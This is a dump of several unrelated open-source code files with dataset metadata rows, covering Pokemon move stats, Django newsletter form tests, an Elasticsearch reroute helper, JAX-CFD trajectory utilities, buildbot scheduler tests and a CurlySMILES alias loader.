return self.get_atacks_count() * self.power
def get_total_cooldown(self):
return self.get_atacks_count() * self.cooldown
def __str__(self):
return self.name
class FastMove(Move):
def get_atacks_count(self):
count = 100 / self.energy
rest = 100 % self.energy
if rest:
count += 1
return count
class ChargeMove(Move):
def get_atacks_count(self):
return 100 / self.energy
BUBBLE = FastMove('Bubble', 31.25, 2.3, 15)
MUD_SHOT = FastMove('Mud Shot', 6, 0.55, 7)
WATER_GUN = FastMove('Water Gun', 7.5, 0.5, 7)
TACKLE = FastMove('Tackle', 12, 1.1, 7)
HYDRO_PUMP = ChargeMove('Hydro Pump', 112.5, 3.8, 100)
ICE_PUNCH = ChargeMove('Ice Punch', 45, 3.5, 33)
SUBMISSION = ChargeMove('Submission', 37.5, 2.1, 33)
AQUA_TAIL = ChargeMove('Aqua Tail', 56.25, 2.35, 50)
WATER_PULSE = ChargeMove('Water Pulse', 43.75, 3.3, 25)
POWER_GEM = ChargeMove('Power Gem', 40, 2.9, 33)
PSYCHIC = ChargeMove('Psychic', 68.75, 2.8, 50)
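# Small demo (an addition, not part of the original module): a rough
# comparison of total damage and total time per full 100-energy cycle for a
# few of the moves defined above.
if __name__ == '__main__':
    for move in (BUBBLE, WATER_GUN, HYDRO_PUMP, AQUA_TAIL):
        print("%s: %.2f damage over %.2fs per 100 energy" % (
            move, move.get_total_power(), move.get_total_cooldown()))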
| gpl-3.0 | -593,390,082,307,868,000 | 30.675 | 55 | 0.590371 | false |
pfpsim/pfpdb | pfpdb/__main__.py | 1 | 1074 | # -*- coding: utf-8 -*-
#
# pfpdb: Debugger for models built with the PFPSim Framework
#
# Copyright (C) 2016 Concordia Univ., Montreal
# Samar Abdi
# Umair Aftab
# Gordon Bailey
# Faras Dewal
# Shafigh Parsazad
# Eric Tremblay
#
# Copyright (C) 2016 Ericsson
# Bochra Boughzala
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
"""pfpdb.__main__"""
from .pfpdb import main
main() | gpl-2.0 | -7,849,093,004,204,732,000 | 27.289474 | 67 | 0.72067 | false |
elin-moco/bedrock | bedrock/newsletter/tests/test_forms.py | 1 | 10098 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from bedrock.mozorg.tests import TestCase
from ..forms import (BooleanRadioRenderer, ManageSubscriptionsForm,
NewsletterFooterForm, NewsletterForm,
UnlabeledTableCellRadios
)
from .test_views import newsletters
class TestRenderers(TestCase):
def test_radios(self):
"""Test radio button renderer"""
choices = ((123, "NAME_A"), (245, "NAME_2"))
renderer = UnlabeledTableCellRadios("name", "value", {}, choices)
output = str(renderer)
# The choices should not be labeled
self.assertNotIn("NAME_A", output)
self.assertNotIn("NAME_2", output)
# But the values should be in there
self.assertIn('value="123"', output)
self.assertIn('value="245"', output)
# Should be table cells
self.assertTrue(output.startswith("<td>"))
self.assertTrue(output.endswith("</td>"))
self.assertIn("</td><td>", output)
def test_boolean_true(self):
"""renderer starts with True selected if value given is True"""
choices = ((False, "False"), (True, "True"))
renderer = BooleanRadioRenderer("name", value="True", attrs={},
choices=choices)
output = str(renderer)
# The True choice should be checked
self.assertIn('checked=checked value="True"', output)
def test_boolean_false(self):
"""renderer starts with False selected if value given is False"""
choices = ((False, "False"), (True, "True"))
renderer = BooleanRadioRenderer("name", value="False", attrs={},
choices=choices)
output = str(renderer)
# The False choice should be checked
self.assertIn('checked=checked value="False"', output)
class TestManageSubscriptionsForm(TestCase):
def test_locale(self):
"""Get initial lang, country from the right places"""
# Get initial lang and country from 'initial' if provided there,
# else from the locale passed in
# First, not passed in
locale = "en-US"
form = ManageSubscriptionsForm(locale=locale, initial={})
self.assertEqual('en', form.initial['lang'])
self.assertEqual('us', form.initial['country'])
# now, test with them passed in.
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'pt',
'country': 'br',
})
self.assertEqual('pt', form.initial['lang'])
self.assertEqual('br', form.initial['country'])
@mock.patch('bedrock.newsletter.forms.get_lang_choices')
def test_long_language(self, langs_mock):
"""Fuzzy match their language preference"""
# Suppose their selected language in ET is a long form ("es-ES")
# while we only have the short forms ("es") in our list of
# valid languages. Or vice-versa. Find the match to the one
# in our list and use that, not the lang from ET.
locale = 'en-US'
langs_mock.return_value = [['en', 'English'], ['es', 'Spanish']]
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'es-ES',
'country': 'es',
})
# Initial value is 'es'
self.assertEqual('es', form.initial['lang'])
def test_bad_language(self):
"""Handle their language preference if it's not valid"""
# Suppose their selected language in ET is one we don't recognize
# at all. Use the language from their locale instead.
locale = "pt-BR"
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'zz',
'country': 'es',
})
self.assertEqual('pt', form.initial['lang'])
class TestNewsletterForm(TestCase):
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_form(self, get_newsletters):
"""test NewsletterForm"""
# not much to test, but at least construct one
get_newsletters.return_value = newsletters
title = "Newsletter title"
newsletter = 'newsletter-a'
initial = {
'title': title,
'newsletter': newsletter,
'subscribed': True,
}
form = NewsletterForm(initial=initial)
rendered = str(form)
self.assertIn(newsletter, rendered)
self.assertIn(title, rendered)
# And validate one
form = NewsletterForm(data=initial)
self.assertTrue(form.is_valid())
self.assertEqual(title, form.cleaned_data['title'])
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_invalid_newsletter(self, get_newsletters):
"""Should raise a validation error for an invalid newsletter."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you',
'email': '[email protected]',
'lang': 'en',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data)
self.assertTrue(form.is_valid())
data['newsletter'] = 'does-not-exist'
form = NewsletterFooterForm('en-US', data=data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['newsletter'][0], 'does-not-exist is not '
'a valid newsletter')
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_multiple_newsletters(self, get_newsletters):
"""Should allow to subscribe to multiple newsletters at a time."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you,beta',
'email': '[email protected]',
'lang': 'en',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertTrue(form.is_valid())
# whitespace shouldn't matter
data['newsletter'] = 'mozilla-and-you , beta '
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['newsletter'],
'mozilla-and-you,beta')
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_multiple_newsletters_invalid(self, get_newsletters):
"""Should throw error if any newsletter is invalid."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you,beta-DUDE',
'email': '[email protected]',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['newsletter'][0], 'beta-DUDE is not '
'a valid newsletter')
class TestNewsletterFooterForm(TestCase):
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_form(self, get_newsletters):
"""Form works normally"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'lang': 'fr',
'newsletter': newsletter,
'privacy': True,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertTrue(form.is_valid(), form.errors)
cleaned_data = form.cleaned_data
self.assertEqual(data['fmt'], cleaned_data['fmt'])
self.assertEqual(data['lang'], cleaned_data['lang'])
def test_country_default(self):
"""country defaults based on the locale"""
form = NewsletterFooterForm(locale='fr')
self.assertEqual('fr', form.fields['country'].initial)
form = NewsletterFooterForm(locale='pt-BR')
self.assertEqual('br', form.fields['country'].initial)
def test_lang_default(self):
"""lang defaults based on the locale"""
form = NewsletterFooterForm(locale='pt-BR')
self.assertEqual('pt', form.fields['lang'].initial)
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_lang_not_required(self, get_newsletters):
"""lang not required since field not always displayed"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'newsletter': newsletter,
'privacy': True,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertTrue(form.is_valid(), form.errors)
# Form returns '' for lang, so we don't accidentally change the user's
# preferred language thinking they entered something here that they
# didn't.
self.assertEqual(u'', form.cleaned_data['lang'])
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_privacy_required(self, get_newsletters):
"""they have to check the privacy box"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'newsletter': newsletter,
'privacy': False,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertIn('privacy', form.errors)
| mpl-2.0 | -663,596,663,655,858,000 | 40.555556 | 79 | 0.56734 | false |
mdunker/usergrid | utils/usergrid-util-python/es_tools/command_sender.py | 2 | 1615 | # */
# * Licensed to the Apache Software Foundation (ASF) under one
# * or more contributor license agreements. See the NOTICE file
# * distributed with this work for additional information
# * regarding copyright ownership. The ASF licenses this file
# * to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# * with the License. You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing,
# * software distributed under the License is distributed on an
# * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# * KIND, either express or implied. See the License for the
# * specific language governing permissions and limitations
# * under the License.
# */
import json
import requests
__author__ = '[email protected]'
# Simple utility to send commands, useful to not have to recall the proper format
data = {
"commands": [
{
"move": {
"index": "usergrid__APPID__application_target_final",
"shard": 14,
"from_node": "elasticsearch018",
"to_node": "elasticsearch021"
}
},
{
"move": {
"index": "usergrid__APPID__application_target_final",
"shard": 12,
"from_node": "elasticsearch018",
"to_node": "elasticsearch009"
}
},
]
}
r = requests.post('http://localhost:9211/_cluster/reroute', data=json.dumps(data))
print r.text | apache-2.0 | 799,847,844,487,885,400 | 30.076923 | 82 | 0.616099 | false |
dls-controls/scanpointgenerator | scanpointgenerator/generators/zipgenerator.py | 1 | 1984 | from annotypes import Anno, deserialize_object, Array, Sequence, Union
from scanpointgenerator.core import Generator, AAlternate
with Anno("List of Generators to zip"):
AGenerators = Array[Generator]
UGenerators = Union[AGenerators, Sequence[Generator], Generator]
@Generator.register_subclass(
"scanpointgenerator:generator/ZipGenerator:1.0")
class ZipGenerator(Generator):
""" Zip generators together, combining all generators into one """
def __init__(self, generators, alternate=False):
# type: (UGenerators, AAlternate) -> None
self.generators = AGenerators([deserialize_object(g, Generator)
for g in generators])
assert len(self.generators), "At least one generator needed"
units = []
axes = []
size = self.generators[0].size
for generator in self.generators:
            assert not any(axis in axes for axis in generator.axes), \
                "You cannot zip generators on the same axes"
assert generator.size == size, "You cannot zip generators " \
"of different sizes"
assert not generator.alternate, \
"Alternate should not be set on the component generators of a" \
"zip generator. Set it on the top level ZipGenerator only."
axes += generator.axes
units += generator.units
super(ZipGenerator, self).__init__(axes=axes,
size=size,
units=units,
alternate=alternate)
def prepare_arrays(self, index_array):
# The ZipGenerator gets its positions from its sub-generators
zipped_arrays = {}
for generator in self.generators:
arrays = generator.prepare_arrays(index_array)
zipped_arrays.update(arrays)
return zipped_arrays
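# Hedged example (an addition; assumes scanpointgenerator's LineGenerator is
# importable and that its constructor signature matches this sketch, which may
# differ between versions):
#     xs = LineGenerator("x", "mm", 0.0, 1.0, 5)
#     ys = LineGenerator("y", "mm", 0.0, 2.0, 5)
#     zipped = ZipGenerator([xs, ys])  # one 5-point generator over axes x, y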
| apache-2.0 | 8,799,549,726,361,614,000 | 38.68 | 80 | 0.580141 | false |
alurin/alurinium-image-processing | alurinium/image/image.py | 1 | 1292 | from urllib.parse import urljoin
from django.conf import settings
from PIL import Image
import os
class ImageDescriptor(object):
name = None
url = None
fullname = None
width = None
height = None
@classmethod
def create_from_file(cls, filename, parse=True):
image = cls()
image.name = filename
image.url = urljoin(settings.MEDIA_URL, 'thumbs/' + filename)
image.fullname = os.path.join(settings.MEDIA_ROOT, 'thumbs', filename)
# get image size
# TODO: Add exception handling
if parse:
image.update()
# return result image
return image
@classmethod
def create_from_image(cls, fullname, result_image):
image = cls()
image.fullname = fullname
image.name = os.path.basename(fullname)
image.url = urljoin(settings.MEDIA_URL, 'thumbs/' + image.name)
# get image size
# TODO: Add exception handling
image.update(result_image)
# return result image
return image
def update(self, image=None):
if not image:
image = Image.open(self.fullname)
        self.width, self.height = image.size
def __str__(self):
return "%s: %sx%s" % (self.url, self.width, self.height) | mit | 797,458,417,655,209,200 | 24.86 | 78 | 0.607585 | false |
uw-it-aca/myuw | myuw/test/api/dept_calendar.py | 1 | 2200 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from myuw.test.api import require_url, MyuwApiTest
import json
@require_url('myuw_deptcal_events')
class TestDeptCalAPI(MyuwApiTest):
'''Test Department Calendar API'''
def get_deptcal(self):
rev = 'myuw_deptcal_events'
return self.get_response_by_reverse(rev)
def test_javerage_cal_apr15(self):
'''Test javerage's deptcal on default date'''
self.set_user('javerage')
self.set_date('2013-4-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(len(data['future_active_cals']), 0)
self.assertEqual(len(data['active_cals']), 2)
events = data['events']
self.assertEqual(len(events), 7)
sorted_events = sorted(events, key=lambda x: x.get('summary'))
event_two = sorted_events[2]
self.assertEqual(event_two['event_location'], u'')
self.assertEqual(
event_two['summary'],
'Organic Chemistry Seminar: Prof. Matthew Becker3')
self.assertEqual(
event_two['event_url'],
'http://art.washington.edu/calendar/?trumbaEmbed=eventid%3D11074'
'21160%26view%3Devent'
)
self.assertTrue(event_two['is_all_day'])
self.assertEqual(event_two['start'], '2013-04-18T00:00:00-07:53')
self.assertEqual(event_two['end'], '2013-04-18T00:00:00-07:53')
def test_javerage_cal_feb15(self):
'''Test javerage's deptcal on date with no events'''
self.set_user('javerage')
self.set_date('2013-2-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(
data,
{'future_active_cals': [], 'active_cals': [], 'events': []})
def test_nonexistant_user(self):
'''Test user with no deptcals'''
self.set_user('none')
self.set_date('2013-4-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(
data,
{'future_active_cals': [], 'active_cals': [], 'events': []})
| apache-2.0 | -2,152,130,454,297,783,600 | 31.835821 | 77 | 0.597727 | false |
google/jax-cfd | jax_cfd/ml/model_utils.py | 1 | 3026 | """Helper methods for constructing trajectory functions in model_builder.py."""
import functools
from jax_cfd.base import array_utils
def with_preprocessing(fn, preprocess_fn):
"""Generates a function that computes `fn` on `preprocess_fn(x)`."""
@functools.wraps(fn)
def apply_fn(x, *args, **kwargs):
return fn(preprocess_fn(x), *args, **kwargs)
return apply_fn
def with_post_processing(fn, post_process_fn):
"""Generates a function that applies `post_process_fn` to outputs of `fn`."""
@functools.wraps(fn)
def apply_fn(*args, **kwargs):
return post_process_fn(*fn(*args, **kwargs))
return apply_fn
def with_split_input(fn, split_index, time_axis=0):
"""Decorates `fn` to be evaluated on first `split_index` time slices.
The returned function is a generalization to pytrees of the function:
`fn(x[:split_index], *args, **kwargs)`
Args:
fn: function to be transformed.
split_index: number of input elements along the time axis to use.
time_axis: axis corresponding to time dimension in `x` to decorated `fn`.
Returns:
decorated `fn` that is evaluated on only `split_index` first time slices of
provided inputs.
"""
@functools.wraps(fn)
def apply_fn(x, *args, **kwargs):
init, _ = array_utils.split_along_axis(x, split_index, axis=time_axis)
return fn(init, *args, **kwargs)
return apply_fn
def with_input_included(trajectory_fn, time_axis=0):
"""Returns a `trajectory_fn` that concatenates inputs `x` to trajectory."""
@functools.wraps(trajectory_fn)
def _trajectory(x, *args, **kwargs):
final, unroll = trajectory_fn(x, *args, **kwargs)
return final, array_utils.concat_along_axis([x, unroll], time_axis)
return _trajectory
def decoded_trajectory_with_inputs(model, num_init_frames):
"""Returns trajectory_fn operating on decoded data.
The returned function uses `num_init_frames` of the physics space trajectory
  provided as an input to initialize the model state, unrolls a trajectory of
  the specified length, and decodes it to the physics space using `model.decode`.
Args:
model: model of a dynamical system used to obtain the trajectory.
num_init_frames: number of time frames used from the physics trajectory to
initialize the model state.
Returns:
Trajectory function that operates on physics space trajectories and returns
unrolls in physics space.
"""
def _trajectory_fn(x, steps, repeated_length=1):
trajectory_fn = functools.partial(
model.trajectory, post_process_fn=model.decode)
# add preprocessing to convert data to model state.
trajectory_fn = with_preprocessing(trajectory_fn, model.encode)
# concatenate input trajectory to output trajectory for easier comparison.
trajectory_fn = with_input_included(trajectory_fn)
# make trajectories operate on full examples by splitting the init.
trajectory_fn = with_split_input(trajectory_fn, num_init_frames)
return trajectory_fn(x, steps, repeated_length)
return _trajectory_fn
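# Hedged usage sketch (an addition; `model` and `physics_trajectory` are
# assumed names, not defined in this module):
#     trajectory_fn = decoded_trajectory_with_inputs(model, num_init_frames=2)
#     final, unroll = trajectory_fn(physics_trajectory, steps=10)
# `unroll` then holds the input frames concatenated with the decoded model
# unroll along the time axis.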
| apache-2.0 | 106,992,124,681,665,070 | 34.6 | 80 | 0.71844 | false |
shawnchin/bbotui | web/bbotui/tests/models/test_model_scheduler_change.py | 1 | 3506 | from django.db import IntegrityError
from django.utils.translation import ugettext_lazy as _
from generic import BbotuiModelTestCase
from bbotui import settings
from bbotui.models import Builder, GitRepository, SVNRepository
from bbotui.models import Scheduler, ChangeScheduler
class TestChangeScheduler(BbotuiModelTestCase):
"""
Test Change Scheduler
"""
def test_simple_creation(self):
"""
Basic Change based scheduler
"""
sched = ChangeScheduler(project = self.project, name = "change")
sched.save()
self.assertNotEqual(sched.id, None)
self.assertEqual(unicode(sched), "change")
self.assertEqual(sched.cast().get_config_type(), _("change scheduler"))
# add builders
builders = ["builder1", "builder2", "builder3"]
for bname in builders:
b = Builder(project=self.project, name=bname)
b.save()
sched.builders.add(b)
self.assertEqual(sched.builders.count(), len(builders))
args = sched.cast().get_config_args()
# check default arguments
self.assertEqual(args.get("name", None), "change")
self.assertEqual(args.get("treeStableTimer", None), settings.DEFAULT_TREE_STABLE_TIMER * 60)
# check builderName
bn = args.get("builderNames", [])
self.assertEqual(len(bn), len(builders))
for i,b in enumerate(builders):
self.assertEqual(bn[i], b)
# try instantiating buildbot config object
self.assert_valid_buildbot_config(sched.cast().get_config_class(), args)
# check filter class
self.assertEqual(sched.cast().get_filter_class(), None)
self.assertEqual(sched.cast().get_filter_args(), None)
# Check that the resulting config string is sensible
self.assert_config_string_executable(sched.cast())
self.assertEqual(None, sched.get_filter_str())
def test_with_repos_filter(self):
"""
Change scheduler which affects only a specific repository
"""
sched = ChangeScheduler(project = self.project, name = "change")
sched.save()
self.assertNotEqual(sched.id, None)
repo = GitRepository(project = self.project, name = "gitrepo",
url = "http://some.git.repo/project.git",
)
repo.save()
self.assertNotEqual(repo.id, None)
sched.limit_to_repository.add(repo)
repo2 = SVNRepository(project = self.project, name = "svnrepo",
url = "http://some.host/svn/project",
)
repo2.save()
self.assertNotEqual(repo2.id, None)
sched.limit_to_repository.add(repo2)
# check filter class
self.assertNotEqual(sched.cast().get_filter_class(), None)
self.assertNotEqual(sched.cast().get_filter_args(), None)
args = sched.cast().get_filter_args()
repolist = args.get("repository", [])
self.assertEqual(len(repolist), 2)
self.assertEqual(repolist[0], "http://some.git.repo/project.git")
self.assertEqual(repolist[1], "http://some.host/svn/project")
# try instantiating buildbot config object
self.assert_valid_buildbot_config(sched.cast().get_filter_class(), args)
# Check that the resulting config string is sensible
self.assert_config_string_executable(sched.cast())
| bsd-3-clause | 4,239,929,282,982,137,000 | 37.119565 | 100 | 0.615231 | false |
axeleratio/CurlySMILESpy | csm_aliases.py | 1 | 13621 | """
This file: csm_aliases.py
Last modified: October 21, 2010
Package: CurlySMILES Version 1.0.1
Author: Axel Drefahl
E-mail: [email protected]
Internet: http://www.axeleratio.com/csm/proj/main.htm
Python module csm_aliases manages primary and secondary
aliases, which are replaced by a component notation (SFN,
Composite, SMILES or annotated SMILES code), when a user
notation is turned into a work notation.
The central method is compnt_notation(self, sAlias)
to get the component notation for an alias.
Copyright (C) 2010 Axel Drefahl
This file is part of the CurlySMILES package.
The CurlySMILES package is free software: you can redistribute it
and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
The CurlySMILES package is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the CurlySMILES package.
If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
class AliasNotations:
def __init__(self,sCsmpyDir,assignDict=1):
"""
dictionaries with aliases:
dictPrimAliases with primary aliases
dictSecAliases with secondary aliases (for a secondary alias
a corresponding primary one must exist)
dictClientAliases with client-provided aliases
"""
self.sCsmpyDir = sCsmpyDir
self.dictPrimAliases = None
self.dictSecAliases = None
if assignDict == 1:
self.initDict()
def initDict(self):
self.dictPrimAliases = self.load_prim_aliases()
self.dictSecAliases = self.load_sec_aliases()
#===================================================================#
# LOAD aliases #
#===================================================================#
"""------------------------------------------------------------------
    load_prim_aliases:
load primary aliases from dictionaries in python modules
located in directory aliases (relative to directory of this
module, which is expected to be in subdirectory csm/py);
return: dictAliases = {sAliasGroup: dictGroup,...}
sAliasGroup = alias group name such as neutral,
cation1p, anion1p, etc., equal to
module name in directory aliases;
dictGroup = {sPrimAlias:sSmiles,...}
"""
def load_prim_aliases(self):
(sDirAliases,lstPyMod) = self.get_module_paths('aliases')
# get all dictionaries with primary aliases
dictPrimAliases = {}
code0 = "sys.path.append('%s')" % sDirAliases
exec code0
for sPyMod in lstPyMod:
lstParts = sPyMod.split(os.sep)
sAliasGroup = lstParts[-1][0:-3]
code1 = "import %s" % sAliasGroup
exec code1
sClassName = sAliasGroup[0].upper() + sAliasGroup[1:]
sClassName = 'Alias' + sClassName
code2 = "oDict = %s.%s()" % (sAliasGroup,sClassName)
exec code2
dictPrimAliases[sAliasGroup] = oDict.getDict()
del oDict
return dictPrimAliases
"""------------------------------------------------------------------
load_sec_aliases:
load secondary aliases from dictionaries in python modules
located in directory secalia (relative to directory of this
this module, which is expected to be in subdirectory csm/py);
return: dictAliases = {sAliasGroup: dictGroup,...}
sAliasGroup = alias group name such as neutral,
cation1p, anion1p, etc., equal to
module name in directory aliases;
dictGroup = {sSecAlias:sPrimAlias,...}
"""
def load_sec_aliases(self):
(sDirAliases,lstPyMod) = self.get_module_paths('secalia')
# get all dictionaries with secondary aliases
dictSecAliases = {}
code0 = "sys.path.append('%s')" % sDirAliases
exec code0
for sPyMod in lstPyMod:
lstParts = sPyMod.split(os.sep)
sAliasGroup = lstParts[-1][0:-3]
# take only modules having a name starting with 'sec_'
if cmp(sAliasGroup[0:4],'sec_') == 0:
sAliasGroup = sAliasGroup[4:]
else:
continue
code1 = "import sec_%s" % sAliasGroup
exec code1
sClassName = sAliasGroup[0].upper() + sAliasGroup[1:]
sClassName = 'Alias' + sClassName
code2 = "oDict = sec_%s.%s()" % (sAliasGroup,sClassName)
exec code2
dictSecAliases[sAliasGroup] = oDict.getDict()
del oDict
return dictSecAliases
"""------------------------------------------------------------------
get_module_paths: find and list absolute path for
each alias module either in sub-directory
sSubdir = 'aliases' or 'secalia'
return: (sDirAliases,lstPyMod), where
sDirAliases is absolute path to subdirectory, and
lstPyMod is list of absolute paths to module files
"""
def get_module_paths(self,sSubdir):
# absolute path to aliases directory
sDirAliases = self.sCsmpyDir + os.sep + sSubdir
# get names of aliases modules
lstPyMod = []
lstFiles = []
lstFiles = os.listdir(sDirAliases)
for sFile in lstFiles:
if len(sFile) < 6 or sFile[-3:] != '.py':
continue
sCompletePath = sDirAliases + os.sep + sFile
if os.path.isfile(sCompletePath):
lstPyMod.append(sCompletePath)
return (sDirAliases,lstPyMod)
#===================================================================#
# LOOK-UP alias (and group-id) #
#===================================================================#
"""------------------------------------------------------------------
compnt_notation: look up alias
return: string with component notation; or
None, if alias not found
"""
def compnt_notation(self, sAlias):
(sCompntNotation,sGroupID) = \
self.compnt_notation_and_groupid(sAlias)
return sCompntNotation
"""------------------------------------------------------------------
compnt_notation_and_groupid: look up alias
return: (sCompntNotation,sGroupId) or (None,None), if not found
sCompntNotation = notation for alias replacement
sGroupId = alias group name such as neutral, cation1p,
anion1p,etc.
"""
def compnt_notation_and_groupid(self,sAlias):
sCompntNotation = None
sGroupId = None
# Primary alias first ...
(sCompntNotation,sGroupId) = self.lookup_as_prim_alias(sAlias)
# ... if not found ...
if sCompntNotation == None: # look up as secondary alias
(sPrimAlias,sCompntNotation,sGroupId) = \
self.lookup_as_sec_alias(sAlias)
return (sCompntNotation,sGroupId)
"""------------------------------------------------------------------
lookup_as_prim_alias:
return: (sCompntNotation,sGroupId) for primary alias or
(None,None) if not found
"""
def lookup_as_prim_alias(self,sPrimAlias):
for sGroupId in self.dictPrimAliases:
dict = self.dictPrimAliases[sGroupId]
if dict.has_key(sPrimAlias):
return (dict[sPrimAlias],sGroupId)
return (None,None)
"""------------------------------------------------------------------
lookup_as_prim_alias_by_groupid:
return: sCompntNotation for primary alias or None if not found
"""
def lookup_as_prim_alias_by_groupid(self,sPrimAlias,sGroupId):
if self.dictPrimAliases.has_key(sGroupId):
dict = self.dictPrimAliases[sGroupId]
if dict.has_key(sPrimAlias):
return dict[sPrimAlias]
else:
return None
"""------------------------------------------------------------------
lookup_as_sec_alias:
return: (sPrimAlias, sCompntNotation,sGroupId) for secondary alias
or (None,None,None) if not found
"""
def lookup_as_sec_alias(self,sSecAlias):
for sGroupId in self.dictSecAliases:
dict = self.dictSecAliases[sGroupId]
if dict.has_key(sSecAlias):
sPrimAlias = dict[sSecAlias]
sCompntNotation = \
self.lookup_as_prim_alias_by_groupid(sPrimAlias,sGroupId)
if sCompntNotation != None:
return (sPrimAlias,sCompntNotation,sGroupId)
return (None,None,None)
#===================================================================#
# MAKE alias dictionary containing primary and secondary aliases #
#===================================================================#
"""------------------------------------------------------------------
makeAliasDict: check consistency of alias-alias and alias-groupid
relations and make dictionary that has both
primary and secondary aliases as key, while value
is the corresponding primary alias (if key is a
primary alias then key and value are the same)
NOTE: this method is for use during development
and extension of alias dictionaries
return: (lstAmbig,dictAliases)
lstAmbig = list of lines, each line reporting an
ambiguity (multiply used alias name)
empty if no ambiguities
dictAliases: {sAlias: sPrimAlias,...}
sAlias = primary or secondary alias
sPrimAlias = primary alias corresponding
to sAlias
Note: client aliases are not considered here
"""
def makeAliasDict(self):
lstAmbig = []
dictAliases = {}
# primary aliases
dictPrimGroupId = {} # dict with first encountered group id
for sPrimGroupId in self.dictPrimAliases:
dictPrim = self.dictPrimAliases[sPrimGroupId]
for sPrimAlias in dictPrim:
if dictAliases.has_key(sPrimAlias):
sLine = '"%s" with two group ids: "%s" and "%s"' % \
(sPrimAlias,sPrimGroupId, dictPrimGroupId[sPrimAlias])
sLine += ' (both for primary alias)'
lstAmbig.append(sLine)
else:
dictPrimGroupId[sPrimAlias] = sPrimGroupId
dictAliases[sPrimAlias] = sPrimAlias
# secondary aliases
dictSecGroupId = {} # dict with first encountered group id
for sSecGroupId in self.dictSecAliases:
dictSec = self.dictSecAliases[sSecGroupId]
for sSecAlias in dictSec:
sPrimAliasCorresp = dictSec[sSecAlias]
# first, check if sec. alias was already used as prim. alias
if dictAliases.has_key(sSecAlias):
sLine = 'sec. alias "%s" ' % sSecAlias
sLine += 'with group id "%s" conflicts ' % sSecGroupId
sLine += 'with same-name prim. alias of group "%s"' % \
dictPrimGroupId[sSecAlias]
lstAmbig.append(sLine)
continue
# also make sure the corresp. prim. alias exists
elif not dictAliases.has_key(sPrimAliasCorresp):
sLine = 'sec. alias "%s" ' % sSecAlias
sLine += 'with group id "%s" ' % sSecGroupId
sLine += 'has no corresponding prim. alias '
sLine += 'named "%s"' % sPrimAliasCorresp
lstAmbig.append(sLine)
continue
else:
# also make sure prim. and sec. share same group id
(sSmiles,sGroupIdCorresp) = \
                     self.lookup_as_prim_alias(sPrimAliasCorresp)
if cmp(sSecGroupId,sGroupIdCorresp) != 0:
sLine = 'group id mismatch for sec. alias '
sLine += '"%s" in group "%s": ' % \
(sSecAlias,sSecGroupId)
sLine += 'corresp. prim. alias "%s" ' % \
sPrimAliasCorresp
sLine += 'is in group "%s"' % sGroupIdCorresp
lstAmbig.append(sLine)
continue
# check if sec. alias is used twice
if dictSecGroupId.has_key(sSecAlias):
sLine = '"%s" with two group ids: "%s" and "%s"' % \
                         (sSecAlias,sSecGroupId, dictSecGroupId[sSecAlias])
sLine += ' (both for secondary alias)'
lstAmbig.append(sLine)
else:
dictSecGroupId[sSecAlias] = sSecGroupId
dictAliases[sSecAlias] = sPrimAliasCorresp
return (lstAmbig,dictAliases)
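# Hedged usage sketch (an addition; the path and alias name below are
# placeholders -- the alias dictionaries are loaded from the aliases/ and
# secalia/ subdirectories of the directory handed to the constructor):
#     oAliases = AliasNotations('/path/to/curlysmiles/py')
#     sNotation = oAliases.compnt_notation('some_alias')  # None if unknown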
